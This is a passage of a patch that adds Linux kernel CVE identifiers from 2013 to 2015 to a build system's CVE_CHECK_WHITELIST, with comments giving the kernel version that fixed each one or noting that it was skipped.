+CVE_CHECK_WHITELIST += "CVE-2013-6432"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6885"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7026"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7027"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7263"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7264"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7265"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7266"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7267"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7268"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7269"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7270"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7271"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7281"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7339"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7348"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7421"
+
+# CVE-2013-7445 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2013-7446"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7470"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0038"
+
+# fixed-version: Fixed after version 3.14rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0049"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0055"
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-0069"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0077"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0100"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0101"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0102"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0131"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-0155"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0181"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0196"
+
+# fixed-version: Fixed after version 2.6.33rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0203"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0205"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-0206"
+
+# Skipping CVE-2014-0972, no affected_versions
+
+# fixed-version: Fixed after version 3.13
+CVE_CHECK_WHITELIST += "CVE-2014-1438"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1444"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1445"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1446"
+
+# fixed-version: Fixed after version 3.13rc8
+CVE_CHECK_WHITELIST += "CVE-2014-1690"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1737"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1738"
+
+# fixed-version: Fixed after version 3.15rc6
+CVE_CHECK_WHITELIST += "CVE-2014-1739"
+
+# fixed-version: Fixed after version 3.14rc2
+CVE_CHECK_WHITELIST += "CVE-2014-1874"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2038"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-2039"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2309"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2523"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-2568"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2580"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2672"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2673"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2678"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2706"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2739"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-2851"
+
+# fixed-version: Fixed after version 3.2rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2889"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3122"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3144"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3145"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3153"
+
+# fixed-version: Fixed after version 3.17rc4
+CVE_CHECK_WHITELIST += "CVE-2014-3180"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3181"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3182"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3183"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3184"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3185"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3186"
+
+# Skipping CVE-2014-3519, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-3534"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3535"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3601"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3610"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3611"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-3631"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3645"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3646"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3647"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3673"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3687"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3688"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3690"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3917"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3940"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4014"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4027"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4157"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4171"
+
+# Skipping CVE-2014-4322, no affected_versions
+
+# Skipping CVE-2014-4323, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4508"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4608"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4611"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4652"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4653"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4654"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4655"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4656"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4667"
+
+# fixed-version: Fixed after version 3.16rc4
+CVE_CHECK_WHITELIST += "CVE-2014-4699"
+
+# fixed-version: Fixed after version 3.16rc6
+CVE_CHECK_WHITELIST += "CVE-2014-4943"
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-5045"
+
+# fixed-version: Fixed after version 3.16
+CVE_CHECK_WHITELIST += "CVE-2014-5077"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5206"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5207"
+
+# Skipping CVE-2014-5332, no affected_versions
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5471"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5472"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6410"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6416"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6417"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6418"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-7145"
+
+# Skipping CVE-2014-7207, no affected_versions
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7283"
+
+# fixed-version: Fixed after version 3.15rc7
+CVE_CHECK_WHITELIST += "CVE-2014-7284"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7822"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7825"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7826"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7841"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7842"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7843"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7970"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7975"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8086"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8133"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8134"
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2014-8159"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8160"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8171"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8172"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2014-8173"
+
+# Skipping CVE-2014-8181, no affected_versions
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8369"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8480"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8481"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8559"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8709"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8884"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8989"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9090"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9322"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9419"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9420"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9428"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9529"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9584"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9585"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9644"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9683"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9710"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9715"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9717"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9728"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9729"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9730"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9731"
+
+# Skipping CVE-2014-9777, no affected_versions
+
+# Skipping CVE-2014-9778, no affected_versions
+
+# Skipping CVE-2014-9779, no affected_versions
+
+# Skipping CVE-2014-9780, no affected_versions
+
+# Skipping CVE-2014-9781, no affected_versions
+
+# Skipping CVE-2014-9782, no affected_versions
+
+# Skipping CVE-2014-9783, no affected_versions
+
+# Skipping CVE-2014-9784, no affected_versions
+
+# Skipping CVE-2014-9785, no affected_versions
+
+# Skipping CVE-2014-9786, no affected_versions
+
+# Skipping CVE-2014-9787, no affected_versions
+
+# Skipping CVE-2014-9788, no affected_versions
+
+# Skipping CVE-2014-9789, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9803"
+
+# Skipping CVE-2014-9863, no affected_versions
+
+# Skipping CVE-2014-9864, no affected_versions
+
+# Skipping CVE-2014-9865, no affected_versions
+
+# Skipping CVE-2014-9866, no affected_versions
+
+# Skipping CVE-2014-9867, no affected_versions
+
+# Skipping CVE-2014-9868, no affected_versions
+
+# Skipping CVE-2014-9869, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9870"
+
+# Skipping CVE-2014-9871, no affected_versions
+
+# Skipping CVE-2014-9872, no affected_versions
+
+# Skipping CVE-2014-9873, no affected_versions
+
+# Skipping CVE-2014-9874, no affected_versions
+
+# Skipping CVE-2014-9875, no affected_versions
+
+# Skipping CVE-2014-9876, no affected_versions
+
+# Skipping CVE-2014-9877, no affected_versions
+
+# Skipping CVE-2014-9878, no affected_versions
+
+# Skipping CVE-2014-9879, no affected_versions
+
+# Skipping CVE-2014-9880, no affected_versions
+
+# Skipping CVE-2014-9881, no affected_versions
+
+# Skipping CVE-2014-9882, no affected_versions
+
+# Skipping CVE-2014-9883, no affected_versions
+
+# Skipping CVE-2014-9884, no affected_versions
+
+# Skipping CVE-2014-9885, no affected_versions
+
+# Skipping CVE-2014-9886, no affected_versions
+
+# Skipping CVE-2014-9887, no affected_versions
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9888"
+
+# Skipping CVE-2014-9889, no affected_versions
+
+# Skipping CVE-2014-9890, no affected_versions
+
+# Skipping CVE-2014-9891, no affected_versions
+
+# Skipping CVE-2014-9892, no affected_versions
+
+# Skipping CVE-2014-9893, no affected_versions
+
+# Skipping CVE-2014-9894, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9895"
+
+# Skipping CVE-2014-9896, no affected_versions
+
+# Skipping CVE-2014-9897, no affected_versions
+
+# Skipping CVE-2014-9898, no affected_versions
+
+# Skipping CVE-2014-9899, no affected_versions
+
+# Skipping CVE-2014-9900, no affected_versions
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9903"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9904"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9914"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-9922"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9940"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2015-0239"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2015-0274"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-0275"
+
+# Skipping CVE-2015-0777, no affected_versions
+
+# Skipping CVE-2015-1328, no affected_versions
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1333"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1339"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1350"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1420"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1421"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1465"
+
+# fixed-version: Fixed after version 3.19rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1573"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1593"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1805"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2041"
+
+# fixed-version: Fixed after version 3.19
+CVE_CHECK_WHITELIST += "CVE-2015-2042"
+
+# fixed-version: Fixed after version 4.0rc4
+CVE_CHECK_WHITELIST += "CVE-2015-2150"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2666"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2672"
+
+# fixed-version: Fixed after version 4.0rc6
+CVE_CHECK_WHITELIST += "CVE-2015-2686"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2830"
+
+# CVE-2015-2877 has no known resolution
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2922"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2925"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3212"
+
+# fixed-version: Fixed after version 2.6.33rc8
+CVE_CHECK_WHITELIST += "CVE-2015-3214"
+
+# fixed-version: Fixed after version 4.2rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3288"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3290"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3291"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2015-3331"
+
+# Skipping CVE-2015-3332, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3339"
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3636"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4001"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4002"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4003"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4004"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4036"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4167"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2015-4170"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4176"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4177"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4178"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4692"
+
+# fixed-version: Fixed after version 4.1rc6
+CVE_CHECK_WHITELIST += "CVE-2015-4700"
+
+# fixed-version: Fixed after version 4.2rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5156"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5157"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5257"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5283"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5307"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5327"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5364"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5366"
+
+# fixed-version: Fixed after version 4.2rc6
+CVE_CHECK_WHITELIST += "CVE-2015-5697"
+
+# fixed-version: Fixed after version 4.1rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5706"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5707"
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-6252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6526"
+
+# CVE-2015-6619 has no known resolution
+
+# CVE-2015-6646 has no known resolution
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6937"
+
+# Skipping CVE-2015-7312, no affected_versions
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7509"
+
+# fixed-version: Fixed after version 4.4rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7513"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7515"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-7550"
+
+# Skipping CVE-2015-7553, no affected_versions
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2015-7566"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7613"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7799"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7833"
+
+# Skipping CVE-2015-7837, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7872"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7884"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7885"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7990"
+
+# Skipping CVE-2015-8019, no affected_versions
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8104"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8215"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8324"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8374"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8539"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8543"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8550"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8551"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8552"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8553"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8569"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8575"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8660"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8709"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8746"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8767"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-8785"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8787"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8812"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8816"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8830"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8839"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8844"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8845"
+
+# Skipping CVE-2015-8937, no affected_versions
+
+# Skipping CVE-2015-8938, no affected_versions
+
+# Skipping CVE-2015-8939, no affected_versions
+
+# Skipping CVE-2015-8940, no affected_versions
+
+# Skipping CVE-2015-8941, no affected_versions
+
+# Skipping CVE-2015-8942, no affected_versions
+
